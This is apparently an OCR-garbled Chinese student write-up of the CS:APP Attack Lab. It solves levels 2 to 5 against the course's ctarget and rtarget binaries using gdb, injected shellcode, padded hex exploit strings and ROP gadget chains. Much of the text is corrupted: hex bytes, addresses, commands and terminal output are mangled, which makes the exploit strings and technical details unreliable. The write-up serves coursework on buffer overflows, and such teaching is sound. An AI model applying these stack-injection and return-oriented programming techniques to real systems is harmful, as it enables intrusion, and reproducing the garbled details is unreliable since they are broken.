计算机系统lab3-The Attack Lab: Understanding Buffer Overflow Bugs
csapp@ubuntu:/Lab3/targets gdb ctarge GNU db(Ubuntu 8. 1-0ubuntu3)8.1.0. 20180409-git Copyright (c) 2018 Free Software Foundation, Inc censeGplv3+:GnuGplversion3orLatershttp://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it ere is NO WARRANTY, to the extent permitted by law. Type "show copying and show warran for details his GDB was configured as x8664-linux-gnu Type "show configuration" for configuration details or bug reporting instructions, please see: chttp://www.gnu.org/software/gdb/bugs/> ind the GDB manual and other documentation resources online at http://www.gnu.org/software/gdb/documentation/> For help, typ Type "apropos word" to search for commands related to"word Reading symbols from ctarget.. done gdb)b test Breakpoint 1 at 0x491968: file visible. c, line 93 db starting progr am: /home/csapp/Lab3/target1/ctarget-q Cookie: 0x59b997fa Breakpoint 1, test ( at visible. C: 90 visible. c: No such file or directory db)囗 通过 gdb ctarget(gdb) b test(gdb)r-q找到 cookie(0x59997fa)的地址, 作为 touch2的参数, 在 targetⅠ里面新建文档 insertvalue.s insert values novq $ox 59b997fa, %rdi push $0x004017ec rete movq$0x59b997fa,%rdi/把 cookie的地址赋给rd pushg$0x004017ec// louch2地址 rete 将这个代码反汇编后, gcc -c insertValue s ob jdump -d insertvalueo> insertvalue d csapp@ubuntu: /Lab3/ targets gcc -c insertvalues csappaubuntu: /Lab3/targets ob -d insertvalueo >insertvalue d csappqubuntu: /Lab3/target1$ 出现 inertia1ue.d和 insertvalue.o 40duio Lxl"deleled Undo cookie txt ctarcet ctarget txt farm. c hex raw insertvalue insertyalue d insertvaluc README. target target11. txt 查看文件 insertvalue.d OpenT insertvalue.d insertvalue.o ile format elT64-x89-64 Disassembly of section .text: 0000000000000000 <. text> ⊙:48c7c7fa97b9s9 50x52b997fa,%rdi :。8ec17回⑨ pushg $/ec 将得到的地址存入%edi寄存器中。然后查看%rsp的地址。通过设置断点的方法, 然后查看寄存器地址。%rsp为0x5561dc78 sappdubuntu: -/Lab3/targets gdb ctarget db (Ubuntu 8. 1-0ubuntu3)8.1. 0.26186109-git Copyright (c)2018 Free Software Foundation, Inc ThereisnONarRaNtytotherefreerlatershttp://gnu.org/licenses/gpl.html> his is free softwar to change and redistribute it extent permitted by law. Type show copying and show warranty for details Thts GDB was configured asx86_64-1tnuxgnu" ypc show configuration" for configuration details For bug reporting instructions, please see http://www.gnuorg/software/gdb/bugs/ Find the CDB manual and other documentation resour ces on Line at http://www.gnu.org/software/gdb/documentation/> : lp type help pe "apropos word" to search for commands related to"word db) b*ex1017at eakpoint 1 at 0x4017af: file buf. c, line 14 (gdb) tartt :/home/csapp/lab3/target1/ Breakpoint 1, 0x00000006004017af in getbuf ()at buf.c: 14 f讠 (gdb)info registers QxQ (555860⊙0 1 x7ffff7dd18c9140737351B56176 0x5561dc78 1432476792 0x55685fe8 9x55685teB 6x5561dc78 x5561dc78 7ffff7fc54814⊙73735490 2b44207284 6x7ffff7b72f59140737349365584 0x401/af 0x401/af <getbuf+/ 最后将40个字节补齐。 18C7C7FA97B95968EC174000C33030303030303030303030 3030303030303030303030303030303078DC615500000000 在 target1里面新建文档 target21 Open F targets.Ext 48 C7C7 FA 97 B2 50 68 EC 1 4908c33030338393930 333836363 383363636363363630 然后调用下面命令查看结果 cat target21. txt./hex2raw.ictarget-q 第三关 void touch3(char *sval) if(hexmatch(cookie, sval)) printf( Touch 3!: You called touch3(\%s)\n", sval) validate(3) else printf( Misfire: You called touch3(\%s")\n", sval) fai1(3); it(0) 第三关其实和第二关存在相似之处,关键在于 cookie此时作为字符串类型的参 数进行传入 如果将 cookie存放在 getout函数里,在 getout函数里调用 hexmatch函数时, 如果调用局部变量,可能会导致 cookie被覆盖,所以就在调用 getout函数的栈 里存放 cookie。由上一道题, 由第二题我们可以得到%rsp的栈指针是0x556ldc78,而%rsp+0x28是返回地址, 那么栈顶部应该为%rsp+0x30(即0x28+8,8代表一个栈指针大小),即 0x5561dca8,又因为 touch3的地址为0x4018fa,所以写出汇编代码如下: 我们可以知道,%rsp的地址为0x556ldc78,其栈内的返回地址+0x28,然后,将 栈指针加8,得到可以存放 cookie的位置,为0x556ldca8. 在targ;eU1里面新建文档 burinsert.s,注入代码 mova $0x59b997fa, %rdi pushg $ 0x004017ec rete bufinsert.s lab/rarge ovq $ 59b997fa, %rdi lpushq $0x004017cc 进行反汇编 gcc -c bufinsert s objdump -d bufinserto bufinsert d csappgubuntu: -/Lab3/targets gcc -c bufinserts ts: Assembler messages bufinsert, s: Warning: end of file not at end of a line; newline inserted csapp@ubuntu: - /Lab3/targets objdump -d bufinsert o >bufinsert d lcsappaubuntu: -/Lab3/targets I bufinsert,d bufinsert o 查看 bufinsert.d bufinsert.d lab3/target bufinsert, o: ormat elf64-x86-64 Disassembly of section. Lex L 9000900000090000 <. text> 0: 48 c7 c7 fa 97 b9 59 mov $3x59b997f a, %rdi 68ec1740⊙0 pushg s3×4017ec ret 注入代码字符串:48c7a8dc615568「a184000c3 然后补齐40个字节 注入代码地址:78dc615500000000(栈指针位置) 接着构造字符串, cookie是0x59b997fa,需要转换成ASCI格式,使用 man ascii 查看即可,对应 ascii码为353962393937666100。 48c7c7a8dc615568fa18 4000c300000000000000 00000000000000000000 00000000000000000000 78dc615500000000 353962393937666100 Open targets. txt 48c7c7a8dc615568fa18 4000c330303036303030 3030363830336303030 3836338303836363838 78dc61550009e00 353962393937666100 最后执行文件 cat target31. txt./hex2raw./ctarget csappgubuntu:/Lab3/targets cat target31 txt I. /fexzraw I-ctarget-q Cook 0x59b997fa Type string: Touch3!: You calLed touch3( 59b997fa") Valid solution for level 3 with target ctarget PASS: Would have posted the following: user id bovik course 15213-f15 attack lab result 1: PASS: oxffffffff: ctarget: 3: 48 C7C7 A8 DC 61 55 58 FA 18 40 30333②3030303@30383933 3303033 8Dc61559000000035396239393765010 csapp@ubuntu: -/Lab3/targets 第四关 因为栈是随机化的,所以我们不能直接使用固定的%sp进行跳转,所以我们使 用rop,用程序自身的代码片段进行攻击。 根据题意,这题要求和第二题相同,将 cookie以参数调用 touch2函数,而和第 二题一·样,我们查的 cookie的地址仍为0x59b997fa, touch2地址仍为0x4017ec°, 接下来我们主要要实现将 cookie传入%di。 B Encodings of popq instructions Operation Register i 岩 ax rcx rax rbx号r即prbp客r91ra1 popq R 58 59 5a 5b 5c 5d5e5f 而如果我们简单的将 cookie存入%rsp中,再弹出,则存在一段字节码5f(popq %rdi,如上图),我们没有找到。但是,我们找到了58,即popq%rax的字节 吗 00000000064019a7 <addval_219>: 419a7: 8d875173589 lea -0x6fa78caf%rdi,%eax 419ad c3 rete 按位进行计数,可知58开始为0x4019ab,所以将其设为 gadget1; 由此按照这种方式,我们的汇编代码应为 Popg %rax Move %rax, %edi Ret 因此,我们寻找movq%rax,%edi这行代码,其字节码对应为4889c7 Ret对应字节码为c3 Sourcc Destination 1) ax ora. 号rCx 号rbx rsp grbp 者rdi 号rax4889c4889c14889 4889∞34889c4488sc54889c64889c7 由此我们找到了 l004019c3< setval426>: 419c3: c774889c790 movl $0x90c78948, (%rdi) 4⊙19c9: C3 rete 同理其起始地址因为0x4019c5,设为 gadget2. 由此,文件包含L.填充区(40字节), gadget的返回地址, cookie, gadget2 的返回地址, Louch2的地址 在 target1里面新建文档 target41.txt CC CCCcccccccccccCc Cc cccccccccccccccccc cc Cc CcCcccccccCc C CcCc CC CCCCCCCcCCCCCcCC CC ab 19 40 00 90 00 0000 fa97b95900000e08 c51948006000e68 ec17466066e63 执行 cat target41. txt./hex2raw.rtarget -q 测试,实验成功 csappoubuntu: -/ab3/target1 File Edit View Search Terminal Help csappqubuntu: -/Lab3/targets cat target41txt I ./hex2raw I -/targe Cookie: 0x59b997fa Type string: Touch2!: You called touch2(0x59b997fa) valid solution for level 2 with target rtarget PASS: Wou Ld have posted the fol lowing: user id bovik course 15213-f15 ttacklab result 1: PASS; exffffff-f: rtarget: 2: CC CC CCCCCCCCCC Cc cc cc cccccc cc cc cccccccc cccc cccc cc ccCC CCCC CC CC Co CC CC CC CC CCCCCCCCCC AB 19 48 0000 00 90 FA 97B9 59 00 068c51940自e6eae006EC174600。e@8 csappQubuntu:-Lab3/targets 第五关 本关也和第三关类似,将 cookie转化为字符串再作为参数传入 touch3函数 本题有两种方法,我选择的是寻找 gadget的方法。 首先寻找和%sp相关的代码,即movq%sp,%ax(4889e0),找到 ⊙86的e461aab< setval350> C7748B9e690 ovl $0x90e08948, (%rdi) 401ab1: 和第四关类似,我们可得首地址为0x101ad,设为 gadget1 接下来,我们寻找一个可以递增%rax的代码片段指向 cookie地址。 我们找到了(%rdi,%rsi,1)代表加法,如下图所示: 0660008004619d6< add xy 419d6 lea (%rdi, %rst, 1),%rax 4⑨19a: reta 即Add$0x37,%a1的0437 由此可得,第二个 gadget2的地址为0x4019d8 最后我们需要最后一步,即movq%rax,%rdi,代表4889c7 00090000004019a0 <addval 273> 4319a6 8d874889c7c Lea-0x3c3876b8(%rdi),%eax 419a6 reto 所以第三个 gadget3地址为0x4019a2 综上所示,最终文件应该含以下几个部分1.40字节的填充区2. gadget, gadget2, gadget3, Louch3的地址3。填充区24. cookie的字符串表示 即如下图所 %sp-40 %ors 0×401a06 %rsp+8 0x×4019d8 %sp+16 0x4019c5 %Sp+24 0x4019fa %rsp+32 %rsp+0x37cookie 而在第三关中我们就可以得到 cookie的字符串表小为3539623939376661 00。且第二个填充区大小为55(0x37)-3*8=31字节 在tar;e1里面新建文档 Large L51.txt targets.txE cc cccc Cc cc Cc ccCc cc cc CC CC CCCC CC CcCC Cc CcCC C CCCC CL CCCC CCCC c CC Cc CC CcCCCC Cc CCCc EC CC ad 1a 40 95 oe 90 d8 19 40 03 00 e0 00 0 fa184e69e66666 dddddd dddddddddd dddd dd dd dddddddddd dd dddd dd dd dd dd dd dd dd dd dd dd dd 35396739393766610 执行 cat target51 txt /hex2raw rtarget-q 测试,实验成功。 csapp@ubuntu: /lab3/targets cat target51 txt ./ hex2raw I./rtarget-q oakie: 0x59b997fa Type string: Touch3!: You called touch3( 5b907fa") Valid solution for level 3 with target rtarget ASS:Would have pos ted the following: user id bov ik course 15213-f15 Lab result 1: PASS: Oxffffffff:rtarget: 3: CCCCCCCCCCCCCCCC CCCC CC C CC CC CCCCCCCC CCCC C CCCCCCCC CC CCCCCCCC CCCC CCCC c CC CCCC CCAD1A400000000000D819480060e600A21940080e9eFA 80 0000 0000 DDDD DD DD DDDDDDDD DD DD DDDDDDDDDD DDDDDDDDDD DD DDDDDDDDDD DD DDDDDDDD 3539 023939 37 66 60 csappaubuntu: - /Lab3/targets